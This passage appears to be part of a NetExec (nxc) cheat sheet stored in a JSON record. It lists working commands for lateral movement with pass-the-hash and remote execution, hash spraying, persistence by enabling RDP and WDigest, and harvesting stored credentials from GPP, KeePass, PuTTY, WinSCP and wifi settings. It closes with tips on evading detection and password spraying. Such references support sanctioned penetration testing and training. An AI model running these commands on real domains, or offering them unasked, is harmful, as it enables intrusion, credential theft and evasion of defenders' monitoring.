-p pass -M adcs\nnxc ldap dc01.domain.local -u user -p pass -M laps\n```\n\n### 5. Lateral Movement\n```bash\n# Pass-the-Hash\nnxc smb targets.txt -u admin -H  -x \"hostname\"\n\n# Execute on multiple targets\nnxc smb targets.txt -u admin -p pass -x \"whoami\"\nnxc winrm targets.txt -u admin -p pass -x \"ipconfig\"\n\n# Spray hashes\nnxc smb targets.txt -u users.txt -H hashes.txt --continue-on-success\n```\n\n### 6. Post-Exploitation\n```bash\n# Persistence\nnxc smb 192.168.1.10 -u admin -p pass -M rdp -o ACTION=enable\nnxc smb 192.168.1.10 -u admin -p pass -M wdigest -o ACTION=enable\n\n# Credential hunting\nnxc smb 192.168.1.10 -u admin -p pass -M spider_plus\nnxc smb 192.168.1.10 -u admin -p pass -M gpp_password\nnxc smb 192.168.1.10 -u admin -p pass -M keepass_discover\n\n# Application credentials\nnxc smb 192.168.1.10 -u admin -p pass -M putty\nnxc smb 192.168.1.10 -u admin -p pass -M winscp\nnxc smb 192.168.1.10 -u admin -p pass -M wifi\n```\n\n---\n\n## Tips & Best Practices\n\n- Use `--continue-on-success` for password spraying to find all valid credentials\n- Use `--no-bruteforce` to stop after first valid credential per host (avoid lockouts)\n- Add `--jitter` to introduce random delays and avoid detection\n- Use `--ufail-limit` and `--fail-limit` to prevent account lockouts\n- Check SMB signing with basic scan before relay attacks\n- Use LDAP for domain enumeration (less noisy than SMB)\n- Pass-the-Hash only needs NTLM hash (not LM)\n- Always specify `-d DOMAIN` or `--local-auth` explicitly\n- Use `cmedb` to review all findings in the database\n- Module options: `-M module_name -o OPTION=value`\n- Rate limit yourself to avoid account lockouts and detection\n- Use `--no-progress` when logging output to files\n- Test authentication across multiple protocols (SMB, WinRM, RDP, MSSQL)\n\n---\n\n## Resources\n\n- **GitHub**: https://github.com/Pennyw0rth/NetExec\n- **Wiki**: https://www.netexec.wiki/\n- **Modules**: https://www.netexec.wiki/getting-started/using-modules", "creation_timestamp": "2026-05-26T06:17:22.000000Z"}]}